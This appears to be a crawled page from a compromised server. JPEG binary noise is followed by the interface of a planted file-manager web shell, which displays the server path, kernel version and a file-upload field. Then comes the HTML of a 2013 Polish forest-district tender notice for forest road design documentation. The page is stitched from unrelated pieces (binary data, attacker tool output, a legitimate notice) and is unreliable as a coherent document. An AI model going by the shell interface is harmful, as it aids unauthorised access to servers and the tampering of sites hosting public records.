JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20130523/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20130523/201076-N-2013.html

<p class="kh_header"><b>Gromnik: Usługa - Wykonanie dokumentacji projektowo kosztorysowej na przebudowę drogi leśnej wewnętrznej nr.6 w leśnictwie Bogoniowice przebiegającej przez oddz. 283,284 o długości    ok. 1500 m, oraz  sprawowanie nadzoru autorskiego w czasie realizacji robót budowlanych</b><br>
<b>Numer ogłoszenia: 201076 - 2013; data zamieszczenia: 23.05.2013</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Lasy Państwowe Nadleśnictwo Gromnik , ul. Generała Andersa 1, 33-180 Gromnik, woj. małopolskie, tel. 014 6514205, faks 014 6515081.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.gromnik.krakow.lasy.gov.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Inny: państwowa jednostka organizacyjna nie posiadająca osobowości prawnej.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Usługa - Wykonanie dokumentacji projektowo kosztorysowej na przebudowę drogi leśnej wewnętrznej nr.6 w leśnictwie Bogoniowice przebiegającej przez oddz. 283,284 o długości    ok. 1500 m, oraz  sprawowanie nadzoru autorskiego w czasie realizacji robót budowlanych.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 1.	Przedmiotem zamówienia jest usługa -wykonanie:
1) dokumentacji projektowo kosztorysowej na przebudowę drogi leśnej wewnętrznej nr 6 w leśnictwie Bogoniowice przebiegającej przez oddz. 283,284 o długości   ok. 1500 m, oraz  sprawowanie nadzoru autorskiego w czasie realizacji robót budowlanych.  
 2) dokonanie uzgodnień, uzyskanie niezbędnych decyzji, map, opinii, pozwoleń i innych   dokumentów  wymaganych przepisami  szczegółowymi  ustawy o ochronie przyrody, środowiska, prawa wodnego i prawa budowlanego na przebudowę drogi.  
3) wytyczenie trasy drogi w terenie
4) sprawowanie nadzoru autorskiego nad przebudową  drogi do czasu zakończenia i odbioru robót budowlanych w terenie.
5) dokumentacja projektowa musi być opracowana w oparciu o: 
a)  Rozporządzenie Ministra Infrastruktury z dnia 3 lipca 2003 r. w sprawie szczegółowego zakresu i formy projektu budowlanego (Dz. U. Nr 120 poz. 1133), 
b)  Rozporządzenie Ministra Infrastruktury z dnia 2 września 2004 r. w sprawie szczegółowego zakresu i  formy dokumentacji projektowej, specyfikacji technicznych wykonania odbioru robót budowlanych oraz programu funkcjonalno-użytkowego. (Dz. U. Nr 202 poz. 2072) 
Według w/w  aktów prawnych dokumentacja projektowa  służąca do opisu przedmiotu zamówienia na wykonanie robót budowlanych dla których   wymagane jest pozwolenie na budowę  musi składać się z  :      
-    projektu budowlanego  w zakresie uwzględniającym specyfikę dla robót budowlanych , 
-    projektów wykonawczych,  
-    przedmiaru robót, 
- informacji dotyczącej bezpieczeństwa i ochrony zdrowia ( Rozporządzenie Ministra Infrastruktury z dnia 23 czerwca 2003r. )
6) Dokumentacja techniczna dla dróg leśnych powinna być ponadto opracowana z uwzględnieniem obowiązującego w Lasach Państwowych Poradnika technicznego - Drogi leśne Warszawa - Bedoń 2006. Poradnik ten określa szczegółowo  zakres i formę dokumentacji technicznej dla dróg leśnych. 
7) Dokumentacja techniczna  na przebudowę- budowę  drogi musi składać się  z dwóch części:        
a) Część rysunkowa   składa się z załączników, które należy wykonać   w zakresie niezbędnym do jednoznacznego określenia przedmiotu zamówienia opracowania przedmiaru robót. Załączniki te, to: mapa orientacyjna, przekrój normalny, profil podłużny, sytuacja szczegółowa,  przekroje poprzeczne, przepusty, wykres ruchu mas ziemnych, rozwiązania szczegółowe i rysunki powtarzalne. 
  - Mapa orientacyjna - w skali 1:10 000. Jako mapa topograficzna lub gospodarcza, na której zaznaczono przebieg drogi i  kilometraż. 
  - Przekrój normalny w skali 1:50 oraz przykładowe przekroje poprzeczne na prostej, na łuku i w miejscu lokalizacji mijanek. Każdy przekrój powinien zawierać następujące dane: szerokość jezdni i poboczy, spadki poprzeczne jezdni   (podłoża i nawierzchni), spadki poprzeczne poboczy, wymiary rowów
drogowych, nachylenia skarp wykopów i nasypów, szerokość torowiska drogowego (tj. pas terenu, na którym wykonywane będą roboty ziemne. z którego powinny być usunięte drzewa i karpy), grubość warstw konstrukcyjnych nawierzchni.                                                                                                               
  - Profil podłużny w skali 1:100/1000. zawierający: kilometraż drogi, rzędne terenu i niwelety, spadki podłużne (wielkości i na jakiej długości), łuki pionowe, lokalizacje przepustów, mijanek i zjazdów, spadki podłużne rowów, odcinki umocnień rowu, lokalizacje urządzeń zabezpieczających, 
  - Sytuacja szczegółowa w skali 1:500 lub 1:1000, zawierająca: wielkości łuków i poszerzeń na łukach, dowiązania wierzchołków, dowiązania reperów, szczegółowe dane wierzchołków (łuków) - kąt zwrotu, promień łuku, długość stycznej, długość łuku, odległość od środka łuku do wierzchołka, lokalizacja mijanek, przepustów, zjazdów na szlaki zrywkowe, placów składowych, lokalizacja znaków drogowych, 
    - Przekroje poprzeczne w skali 1:100 - w miejscach charakterystycznych, gdzie występują zmiany w wielkościach robót ziemnych oraz regularnie co 30-50 m, rzędne terenu niwelety, wielkości wykopów i nasypów, wielkości poszerzeń na łukach, 
  - Przepusty w skali 1: 100, tj.: sytuacje i przekroje poprzeczne przepustów, głębokość posadowienia, rzędne wlotu i wylotu przepustu, ubezpieczenia wlotu i wylotu, wysokość nasypu. 
  - Wykres ruchu mas ziemnych w skali 1:1000. Tabela objętości mas ziemnych. odległości i wielkości mas ziemnych na przerzut koparką, na przepych spycharką i przewóz ziemni samochodami, 
    - Rozwiązania szczegółowe sączki poprzeczne i podłużne, ubezpieczenia skarp i dna rowów, rysunki brodów,  wodospusty, mijanki, 
   - Rysunki powtarzalne. 
b) Część opisowa składa się z : opisu technicznego, obliczenia świateł przepustów, przedmiaru robót, kosztorys , specyfikacji  technicznej wykonania i odbioru robót (STWiOR) i analizy wpływu na środowisko. 
   - Opis techniczny, w którym powinny być zawarte: lokalizacja, podstawa opracowania, opis trasy, warunki gruntowo-wodne, droga w planie, droga w przekroju podłużnym, droga w przekroju poprzecznym, przekrój normalny, mijanki, zjazdy i place składowe, odwodnienie, obiekty, technologia wykonania robót ziemnych, urządzenia zabezpieczające, urządzenia obce i stosunki prawne, dowiązania wysokościowe, ochrona przyrody krajobrazu, informacja dotycząca bezpieczeństwa i ochrony zdrowia (BIOZ) wnioski dot. wykonawstwa, materiały, klauzula wykonawcza. 
  - Obliczenie świateł przepustów (w/g potrzeby). 
  -  Przedmiar robót, który powinien zawierać zestawienie przewidywanych do wykonania robót podstawowych w kolejności technologicznej ich wykonania wraz z ich szczegółowym opisem lub wskazaniem podstaw ustalających szczegółowy opis oraz wskazaniem właściwych specyfikacji technicznych wykonania i odbioru robót budowlanych. z wyliczeniem i zestawieniem ilości jednostek przedmiarowych robót podstawowych. 
 - Kosztorys, tj. kosztorys inwestorski, kosztorys ślepy. 
 - Specyfikacja techniczna wykonania i odbioru robót (STWiOR)I jako opracowanie szczegółowe dla danego zadania (obiektu budowlanego), i zawierające zbiory wymagań, które są niezbędne do określenia standardu i jakości wykonania roboty budowlanej, stosowania materiałów i technologii oraz zasad odbierania i oceny prawidłowości wykonania poszczególnych robót. 
  - Analiza wpływu na środowisko, a w szczególności na gatunki, siedliska chronione, stosunki wodne, krajobraz, zjawiska geologiczne, gleby. 
 W dokumentacji projektowej zabrania się opisywania materiałów, urządzeń za pomocą znaków towarowych, patentów lub pochodzenia, chyba, że jest to uzasadnione specyfiką przedmiotu a wykonawca nie może opisać zamówienia za pomocą dostatecznie dokładnych określeń, a wskazaniu temu towarzyszy wyraz bądź równoważne, oraz jest dokonany opis w jaki sposób tą równoważność należy zweryfikować.
2. Do podstawowych obowiązków projektanta należą czynności określone w Prawie budowlanym art.20.

 3.   Opis stanu istniejącego, planowanego  : 
    - planowany przez Zamawiającego  przebieg trasy drogi o dł. ok.1500 m  po istniejącej trasie drogi o nawierzchni gruntowej i żwirowej         
    - planowana  nawierzchnia drogi -tłuczniowa
    - planowana szerokość korony drogi -5 m
    - do zaprojektowania mijanki , składnice drewna, przepusty wraz z ubezpieczeniami wlotu i wylotu, wodospusty 
    - klasyfikacja drogi:  leśna główna-  grzbietowa ,stokowa

 4.  Wszelkie rozwiązania techniczne oraz zakres projektowanych robót  należy ustalić z  Zamawiającym. 
 5.  Przed sporządzeniem   ostatecznej  wersji dokumentacji projektowej Wykonawca (projektant) przedstawi  Zamawiającemu w wersji roboczej dokumentację projektową do weryfikacji.    
 6.  Dokumentacja projektowa winna składać się z:
    - projektu  budowlanego, wykonawczego- 3 egz. dla Zamawiającego,  oraz ilość egz. wymagana do uzyskania pozwolenia wodnoprawnego  na przebudowę przepustów  (jeżeli   dotyczy) 
    - kosztorysu inwestorskiego - 3 egz.,  ślepego 3- egz. 
    - przedmiaru robót- 3 egz   
     - specyfikacji technicznych wykonania i odbioru robót 3 egz.  
7. W/w. dokumentację należy sporządzić w wersji analogowej (drukowanej) oraz cyfrowej (doc., xls., pdf. - lub innej uzgodnionej z Zamawiającym). Wielkość plików cyfrowych nie powinna przekraczać 500 kB.
8. W przypadku  gdyby Zamawiający nie zrealizował planowanego zakresu prac w czasie ważności kosztorysu inwestorskiego,  wykonawca dokona aktualizacji kosztorysu inwestorskiego  w terminie 14 dni od daty zlecenia przez Nadleśnictwo Gromnik  w ramach otrzymanego wynagrodzenia za sporządzoną  dokumentację.
9. Przed złożeniem oferty na wykonanie usługi zaleca się oferentowi dokonanie wizji terenowej .
10. Przekazanie  dokumentacji   Zamawiającemu  przez  Wykonawcę   nastąpi wraz z wymaganymi  prawomocnymi  decyzjami .
11. Zamawiający dopuszcza  powierzenie wykonania części prac podwykonawcą, lecz wyłącznie te prace, które Wykonawca wskazał i wymienił w ofercie. W przypadku wygranej Wykonawca przed podpisaniem umowy przedstawi Zamawiającemu umowy zawarte pomiędzy Wykonawcą a  podwykonawcami.
12. Zamawiający informuje, że w przypadku zaistnienia okoliczności, których nie można było przewidzieć w chwili zawarcia umowy, lub zmian korzystnych dla Zamawiającego, Zamawiający może dokonać zmian postanowień zawartej umowy  co do terminu wykonania umowy, zmian w zakresie np.: formy zabezpieczenia umowy..</p>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 71.32.20.00-1.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 30.11.2013.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> 1. Oferta musi być zabezpieczona wadium  w  następującej  wysokości:
  	  wadium o wartości:   900  zł. (słownie : dziewięćset złotych)

2.Wadium może być wniesione w jednej lub kilku następujących formach:
a )   pieniądzu,
b)   poręczeniach bankowych lub poręczeniach spółdzielczej kasy oszczędnościowo - kredytowej, z tym że poręczenie kasy jest zawsze poręczeniem pieniężnym
c)	gwarancjach bankowych,
d)	gwarancjach ubezpieczeniowych,
e)	poręczeniach udzielanych przez podmioty, o których mowa w art. 6 ust. 5 pkt. 2 lit. b ustawy z dnia 9 listopada 2000 r. o utworzeniu Polskiej Agencji Rozwoju Przedsiębiorczości (Dz. U.  z 2007 r., Nr 42, poz. 275 z zm.).
3. Wadium w formie pieniężnej należy wnieść na rachunek bankowy Zamawiającego: Konto BGŻ S.A. o/T -ów 12203000451110000000840200 z dopiskiem na blankiecie przelewu, jakiego postępowania dotyczy. 
4.Wadium wnoszone w formie niepieniężnej należy złożyć w formie oryginału w kasie Zamawiającego w godzinach   od 800 do 1400 .
5. Z treści gwarancji (poręczenia) musi jednoznacznie wynikać, jaki jest sposób reprezentacji Gwaranta. Gwarancja musi być podpisana przez upoważnionego (upełnomocnionego) przedstawiciela Gwaranta. Podpis winien być sporządzony w sposób umożliwiający jego identyfikację np. złożony wraz z imienną pieczątką lub czytelny (z podaniem imienia i nazwiska). Z treści gwarancji winno wynikać bezwarunkowe zobowiązanie Gwaranta do wypłaty Zamawiającemu pełnej kwoty wadium w okolicznościach określonych w art. 46 ust. 5 ustawy, na każde pisemne żądanie zgłoszone przez Zamawiającego w terminie związania ofertą.
6. Wadium musi być wniesione najpóźniej do wyznaczonego terminu składania ofert. tj. do dnia 03.06.2013 r. do godz. 9:00.
7. Wniesienie wadium w pieniądzu będzie skuteczne, jeżeli w podanym terminie znajdzie się na rachunku bankowym Zamawiającego.
8.Wykonawca, który nie wniesie wadium zostanie wykluczony z postępowania, a jego oferta zostanie uznana za odrzuconą.
9.Zamawiający  zwraca  niezwłocznie  wadium:
a) wszystkim wykonawcom po wyborze oferty najkorzystniejszej lub unieważnieniu postępowania, z wyjątkiem wykonawcy którego oferta została wybrana jako najkorzystniejsza,
b) zawarto umowę w sprawie zamówienia publicznego i wniesiono zabezpieczenie należytego wykonania tej umowy,
c) na wniosek wykonawcy, który wycofał ofertę przed terminem składania ofert,
10. Zamawiający żąda ponownego wniesienia wadium przez wykonawcę któremu wadium zwrócono, jeżeli w wyniku rozstrzygnięcia odwołania jego oferta została wybrana jako najkorzystniejsza.
11. Wadium Wykonawcy, którego oferta została wybrana, zostanie zatrzymane wraz z odsetkami w przypadku, gdy Wykonawca:
a)	 odmówi podpisania umowy na warunkach określonych w ofercie,
b)	 nie wniesie zabezpieczenia należytego wykonania umowy,
c)	 zawarcie umowy stanie się niemożliwe z przyczyn leżących po stronie Wykonawcy.
d)	oraz w przypadku jeżeli Wykonawca w odpowiedzi na wezwanie, o którym mowa w art. 26 ust. 3 ustawy Pzp, nie złożył dokumentów lub oświadczeń, o których mowa w art. 25 ust. 1 ustawy Pzp, lub pełnomocnictw, chyba, że udowodni, że wynika to z przyczyn nie leżących po jego stronie.</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>zamawiający nie precyzuje tego warunku, na potwierdzenie spełnienia wymaga się oświadczenia</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>zamawiający uzna ten warunek za spełniony gdy wykonawca wykaże iż w okresie ostatnich 3 lat przed upływem terminu składania ofert a jeśli okres prowadzenia działalności jest krótszy - w tym okresie wykonał w sposób należyty  co najmniej 2 odrębne usługi  polegające na wykonaniu dokumentacji projektowo kosztorysowej na przebudowę lub budowę dróg o wartości 30 tyś. zł. netto każda z  nich. Ocena spełnienia tego warunku zostanie dokonana na podstawie kryterium  spełnia/ nie spełnia w oparciu o przedstawiony wykaz usług.
Wykonawca może polegać na wiedzy i doświadczeniu innych podmiotów, niezależnie od charakteru łączących go z nimi stosunków. Wykonawca w takiej sytuacji zobowiązany jest udowodnić zamawiającemu, iż będzie dysponował zasobami niezbędnymi do realizacji zamówienia w zakresie wiedzy i doświadczenia, w szczególności przedstawiając w celu pisemne zobowiązanie tych podmiotów do oddania mu do dyspozycji niezbędnych zasobów na okres korzystania z nich przy wykonaniu zamówienia.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>zamawiający nie precyzuje tego warunku, na potwierdzenie spełnienia wymaga się oświadczenia</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>zamawiający uzna ten warunek za spełniony gdy wykonawca wykaże, że posiada 1 osobę z co najmniej 2 letnim doświadczeniem w zakresie  projektowania z uprawnieniami w specjalności konstrukcyjno - inżynieryjnej w zakresie dróg, oraz przedstawi informację o podstawie do dysponowania tą osobą. Ocena spełnienia tego warunku zostanie dokonana na podstawie kryterium  spełnia/ nie spełnia w oparciu o przedstawiony wykaz osób i złożone przez wykonawcę oświadczenie o posiadaniu uprawnień przez tą osobę. 
Wykonawca może polegać na osobach zdolnych do wykonania zamówienia innych podmiotów, niezależnie od charakteru łączących go z nimi stosunków. Wykonawca w takiej sytuacji zobowiązany jest przedstawić wraz z wykazem osób informację o podstawie do dysponowania tymi osobami oraz udowodnić zamawiającemu, iż będzie dysponował tymi osobami, w szczególności przedstawiając w celu pisemne zobowiązanie tych podmiotów do oddania mu do dyspozycji udostępnionych osób na okres korzystania z nich przy wykonaniu zamówienia.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>zamawiający nie precyzuje tego warunku, na potwierdzenie spełnienia wymaga się oświadczenia</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, głównych dostaw lub usług, w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich wartości, przedmiotu, dat wykonania i podmiotów, na rzecz których dostawy lub usługi zostały wykonane, oraz załączeniem dowodów, czy zostały wykonane lub są wykonywane należycie;</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami;</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień;</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul><p><b>III.6) INNE DOKUMENTY</b></p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>Jeżeli w kraju miejsca zamieszkania osoby lub w kraju, w którym Wykonawca ma siedzibę lub miejsce  zamieszkania nie wydaje się dokumentów opisanych powyżej III.4.3.1 , zastępuje się je dokumentem zawierającym oświadczenie, w którym określa się także osoby uprawnione do reprezentacji  wykonawcy, złożone przed właściwym organem sądowym, administracyjnym albo organem samorządu  
         zawodowego lub gospodarczego odpowiednio kraju zamieszkania  osoby lub kraju, w którym wykonawca ma  siedzibę lub miejsce zamieszkania, lub przed notariuszem  wystawione w terminie nie wcześniej niż 6  miesięcy przed upływem terminu składania ofert.</p>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>1.	Zamówienie zostanie udzielone na warunkach określonych szczegółowo w załączonym do SIWZ wzorze umowy.
2.	W przypadku gdy Wykonawcy składający wspólnie ofertę ustanowią w postępowaniu o udzielenie zamówienia pełnomocnika, Zamawiający zawiadamia o wynikach postępowania pełnomocnika.
3.	Zamawiający informuje, że w przypadku zaistnienia okoliczności, których nie można było przewidzieć w chwili zawarcia umowy, lub zmian korzystnych dla Zamawiającego, Zamawiający może dokonać zmian postanowień zawartej umowy   co do :
a)	Możliwości zmiany terminu zakończenia realizacji przedmiotu zamówienia w przypadku:
1)	zmiany będące następstwem okoliczności leżących po stronie zamawiającego, w szczególności: 
- wstrzymanie prac przez zamawiającego na jego wyraźne żądanie, konieczność wprowadzenia zmian w dokumentacji projektowej.
                   2)     inne przyczyny zewnętrzne niezależne od zamawiającego oraz wykonawcy w szczególności np.; przedłużające się procedury administracyjne dotyczące  uzyskania pozwoleń, decyzji z przyczyn nie wynikających z winy wykonawcy.
3)	inne okoliczności związane z przedłużającą się procedurą przetargową mająca wpływ na termin  podpisania umowy i przystąpienia do realizacji prac.
